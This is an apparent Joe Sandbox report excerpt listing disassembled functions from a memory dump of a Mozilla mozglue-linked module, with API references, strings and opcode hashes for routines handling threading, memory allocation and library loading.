Opcode ID: 6d4b0cf4334a866f3ab5d5acd0b3a5b37c7dd2e17cbcae53009bafefe6a36463
Instruction ID: 7d8fe8aee706008770b513e448f410e31afc0d148446a1649ce89f55346625dc
Opcode Fuzzy Hash: 6d4b0cf4334a866f3ab5d5acd0b3a5b37c7dd2e17cbcae53009bafefe6a36463
Instruction Fuzzy Hash: 0EE08CE2A1101037F514635AAC86EBB765CDBC6134F080039FE0D82311E94AAD1A51F7

Function 6CCA05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05c6c23e6ca059f1893895bb7723416a43ef4480451e1f4a6f14aa814478f57
Instruction ID: dfd7458892ba11e27a08a86cfdb6b7ad0d8f616ce66bf558d4f87008521c8f96
Opcode Fuzzy Hash: b05c6c23e6ca059f1893895bb7723416a43ef4480451e1f4a6f14aa814478f57
Instruction Fuzzy Hash: EDA149B0A00646CFDB14CF69C598B99FBF5BF49344F44866ED84A97B00E730A946CFA0

Function 6CCF14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCF14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CCF14E2
GetCurrentThreadId.KERNEL32 ref: 6CCF1546
InitializeConditionVariable.KERNEL32(?), ref: 6CCF15BA
free.MOZGLUE(?), ref: 6CCF16B4

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: a4a83bdc60bb858d5994a63227b0d2aa1fa29c240923e87292a5579e4744ecb9
Instruction ID: f3434f1e720d1f09e44121020eae052417393da8a88af2df0d100a35247c410c
Opcode Fuzzy Hash: a4a83bdc60bb858d5994a63227b0d2aa1fa29c240923e87292a5579e4744ecb9
Instruction Fuzzy Hash: 3C61D2B1A007449FDB118F25C880BDEB7B5BF89308F44851DED9A57701EB35E94ACB91

Function 6CCEDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCEDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6CCED38A,?), ref: 6CCEDC6F
free.MOZGLUE(?,?,?,?,?,6CCED38A,?), ref: 6CCEDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CCED38A,?), ref: 6CCEDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CCED38A,?), ref: 6CCEDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CCED38A,?), ref: 6CCEDD4A

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 1351d581f3c559cf6e59c896f0e4fb124822586a48fe2f116d06a14fe6c025c9
Instruction ID: 8fa05dde2d362ae4b5c57d5bafb3fa1066c584712b577d55269bb99ffe027e0e
Opcode Fuzzy Hash: 1351d581f3c559cf6e59c896f0e4fb124822586a48fe2f116d06a14fe6c025c9
Instruction Fuzzy Hash: C6417AB5A00215DFCB00CF99C88099ABBF6FF8D304B154469DA46ABB11E771FC01CB90

Function 6CCD6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6CCCFA80: GetCurrentThreadId.KERNEL32 ref: 6CCCFA8D
Part of subcall function 6CCCFA80: AcquireSRWLockExclusive.KERNEL32(6CD1F448), ref: 6CCCFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCD6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CCD67C8

Part of subcall function 6CCE4290: memcpy.VCRUNTIME140(?,?,6CCF2003,6CCF0AD9,?,6CCF0AD9,00000000,?,6CCF0AD9,?,00000004,?,6CCF1A62,?,6CCF2003,?), ref: 6CCE42C4

Strings

data, xrefs: 6CCD6593

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: 9ada673126c39dcf82c40db4dee0c5b630c17a13027d38b53afeafb42b389a87
Instruction ID: 1a3281e2597277e2d893efba096f68e8d30dfe79f2a8672385d95a8367aebbfd
Opcode Fuzzy Hash: 9ada673126c39dcf82c40db4dee0c5b630c17a13027d38b53afeafb42b389a87
Instruction Fuzzy Hash: C2D1E075A083408FD724DF69C851B9FB7E5AFC5308F11492EE68987B51EB30E849CB52

Function 6CCCD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CC9EB57,?,?,?,?,?,?,?,?,?), ref: 6CCCD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CC9EB57,?), ref: 6CCCD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CC9EB57,?), ref: 6CCCD673
free.MOZGLUE(?), ref: 6CCCD888

Strings

|Enabled, xrefs: 6CCCD81E

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: 7de7bd1553655696ab4472ba41d12167bb7c658655a75f3dfc6352ae62ad708b
Instruction ID: 1094f5da8de9aebdc15e89074909945576a4583d6475004b78773cf416577f43
Opcode Fuzzy Hash: 7de7bd1553655696ab4472ba41d12167bb7c658655a75f3dfc6352ae62ad708b
Instruction Fuzzy Hash: 4FA105B0B043458FDB01CF69C4D07AEBBF1AF49318F14845CD899ABB41E735A845CBA2

Function 6CCCF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CCCF480

Part of subcall function 6CC9F100: LoadLibraryW.KERNEL32(shell32,?,6CD0D020), ref: 6CC9F122
Part of subcall function 6CC9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC9F132

CloseHandle.KERNEL32(00000000), ref: 6CCCF555

Part of subcall function 6CCA14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CCA1248,6CCA1248,?), ref: 6CCA14C9
Part of subcall function 6CCA14B0: memcpy.VCRUNTIME140(?,6CCA1248,00000000,?,6CCA1248,?), ref: 6CCA14EF

Part of subcall function 6CC9EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CC9EEE3

CreateFileW.KERNEL32 ref: 6CCCF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6CCCF523

Strings

\oleacc.dll, xrefs: 6CCCF4CB

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 268254b34e011011669fef19e34f0676599a9c63b77ae9eb85da1fff7c52e93f
Instruction ID: 29c2d4985fc61a64d787081cdf11e1beb6313af04191619328c3f73a96d6b718
Opcode Fuzzy Hash: 268254b34e011011669fef19e34f0676599a9c63b77ae9eb85da1fff7c52e93f
Instruction Fuzzy Hash: CB41A2707187109FE720DF69C884A9BB7F8AF45318F504A1DF69583A50FB30D94ACB92

Function 6CCF74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6CCF7526
__Init_thread_footer.LIBCMT ref: 6CCF7566
__Init_thread_footer.LIBCMT ref: 6CCF7597

Strings

UnmapViewOfFile2, xrefs: 6CCF7552
kernel32.dll, xrefs: 6CCF7557

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 4d4364f6eebdc908211302e2d2503a5ba827b4149fe2483e38c7826ef07934a3
Instruction ID: 16afa801f129f83f7a0600b1fc1f92e9e76eeaf13f65154a4db1abeaff87c4d5
Opcode Fuzzy Hash: 4d4364f6eebdc908211302e2d2503a5ba827b4149fe2483e38c7826ef07934a3
Instruction Fuzzy Hash: AB213731705501A7EB15EFE9D819E89377AEF86324B10452DE61547F40E730A807DB92

Function 6CCFC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CCFC0E9), ref: 6CCFC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CCFC437
FreeLibrary.KERNEL32(?,6CCFC0E9), ref: 6CCFC44C

Strings

NtQueryVirtualMemory, xrefs: 6CCFC431
ntdll.dll, xrefs: 6CCFC413

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 6e0fcd09092b49df9760622118cea5a0ce3281ca0bbcb1c07e27832b50d1bdfb
Instruction ID: 9fa42edc2d5aa6006baea541554af6166373ed1b100cdfdd4c9b443a21851fc0
Opcode Fuzzy Hash: 6e0fcd09092b49df9760622118cea5a0ce3281ca0bbcb1c07e27832b50d1bdfb
Instruction Fuzzy Hash: 54E092F4705301ABFB00AF79D90A715BEFCAB06208F004616AB8891F50EBB0C0179B50

Function 6CCF75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CCF748B,?), ref: 6CCF75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CCF75D7
FreeLibrary.KERNEL32(?,6CCF748B,?), ref: 6CCF75EC

Strings

ntdll.dll, xrefs: 6CCF75B3
RtlNtStatusToDosError, xrefs: 6CCF75D1

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 85e967e987ced6405ed3263b54abd8ab5e223d0f1ffc4a8c2264becf2a97bbb7
Instruction ID: 56c0816b230e18ec983f62cb589fa0e88640080660bde908f8a9f42e01fe253e
Opcode Fuzzy Hash: 85e967e987ced6405ed3263b54abd8ab5e223d0f1ffc4a8c2264becf2a97bbb7
Instruction Fuzzy Hash: 1AE092B1604301BBFB01BBA2D84A7017AFCEB06258F204025AB05D1F50EBB4D057CF10

Function 6CCFBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6CCFBE49), ref: 6CCFBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6CCFBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CCFBE49), ref: 6CCFBF38
RtlReAllocateHeap.NTDLL ref: 6CCFBF83
RtlFreeHeap.NTDLL(6CCFBE49,00000000), ref: 6CCFBFA6

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 6d3eaf4d2a94d25946d97f3da85a6ee836fe0920397b91d4d5005a651e4355dd
Instruction ID: 55d8e6ffe1fdc94e555b94476b9d0a65581e1d84716c8970bab900848875ecc8
Opcode Fuzzy Hash: 6d3eaf4d2a94d25946d97f3da85a6ee836fe0920397b91d4d5005a651e4355dd
Instruction Fuzzy Hash: C5518F75B002058FE754CF69CD90BAAB3A2FF88314F298629D525A7B54E730F9078B91

Function 6CC94DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC94E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC94E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC94EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC94F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CC94F1E

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: f8ca0473766d56cf521e1725c59e7bb5e11018702dfbca64948743878326171c
Instruction ID: 9cf23ef852a5908461426de697bf63dbbfede0fca1af1c8efdd6a2f914d9b17d
Opcode Fuzzy Hash: f8ca0473766d56cf521e1725c59e7bb5e11018702dfbca64948743878326171c
Instruction Fuzzy Hash: E841D0716087069FC705CF69C48095BF7E4BF89344F108A2DF56687B51EB30E958CB92

Function 6CCA1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA15BC
moz_xmalloc.MOZGLUE(-00000001,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA15E7
free.MOZGLUE(?,?,?,?,?,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA1637

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 6a73fffb5bda5900551bf8199595c5c2e6618f883df8bc92c5036c2248a88b2b
Instruction ID: 07ef8db188b671991b11396f9c6ac3e0535adb7eaa57359d0198bb10aaffa1b9
Opcode Fuzzy Hash: 6a73fffb5bda5900551bf8199595c5c2e6618f883df8bc92c5036c2248a88b2b
Instruction Fuzzy Hash: CF31C771A00516CBC7188EACD85856E76E9FB853747250B2DE423DBBE4FB30D9068791

Function 6CCFAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFAD9D

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFAE01
GetLastError.KERNEL32(?,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFAE3D

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: d0b70455c6ab9be867547fe949f746160678387275a149f786eed55471c4eb53
Instruction ID: 355c5daf34f67d9cee036124e18c3c91bb5dd3156edc42fd4b1c4f2ec21168b3
Opcode Fuzzy Hash: d0b70455c6ab9be867547fe949f746160678387275a149f786eed55471c4eb53
Instruction Fuzzy Hash: FF3141B1A002159FDB50DF7A8C44AABB7F8EF88614F158829E95AD7710F734D805CBB1

Function 6CCF5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CD0DCA0,?,?,?,6CCCE8B5,00000000), ref: 6CCF5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CCCE8B5,00000000), ref: 6CCF5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CCCE8B5,00000000), ref: 6CCF5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CCCE8B5,00000000), ref: 6CCF5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CCCE8B5,00000000), ref: 6CCF5FD6

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 92a160e8a1dc72939a7368fd3eeee15b1306737c57bab01feaa2a7ce0531a4cc
Instruction ID: cbc42b367dd39ef5d468d009f5e0d9a99764311c64a250a8011e0f2afdcf9d67
Opcode Fuzzy Hash: 92a160e8a1dc72939a7368fd3eeee15b1306737c57bab01feaa2a7ce0531a4cc
Instruction Fuzzy Hash: 233132743006009FE754CF29C898E26BBF9FF89359B648598F66687B95D731EC42CB80

Function 6CC9B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6CC9B532
moz_xmalloc.MOZGLUE(?), ref: 6CC9B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC9B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CC9B57E
free.MOZGLUE(00000000), ref: 6CC9B58F

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 5e5949b7188b2af5d8f7a9e0dcc0d1da5ecd512e20b345a7d22743d585211c1c
Instruction ID: 9f80fe989573b56f59870d716232473e56de7635df367435c994f90e7096fda4
Opcode Fuzzy Hash: 5e5949b7188b2af5d8f7a9e0dcc0d1da5ecd512e20b345a7d22743d585211c1c
Instruction Fuzzy Hash: 6B21E771A00205AFDB108F69CC50BAAFBB9FF85314F284129E918DB751F776D911C7A1

Function 6CCF6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CCF6E78

Part of subcall function 6CCF6A10: InitializeCriticalSection.KERNEL32(6CD1F618), ref: 6CCF6A68
Part of subcall function 6CCF6A10: GetCurrentProcess.KERNEL32 ref: 6CCF6A7D
Part of subcall function 6CCF6A10: GetCurrentProcess.KERNEL32 ref: 6CCF6AA1
Part of subcall function 6CCF6A10: EnterCriticalSection.KERNEL32(6CD1F618), ref: 6CCF6AAE
Part of subcall function 6CCF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CCF6AE1
Part of subcall function 6CCF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CCF6B15
Part of subcall function 6CCF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CCF6B65
Part of subcall function 6CCF6A10: LeaveCriticalSection.KERNEL32(6CD1F618,?,?), ref: 6CCF6B83

MozFormatCodeAddress.MOZGLUE ref: 6CCF6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CCF6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CCF6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CCF6EFF

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
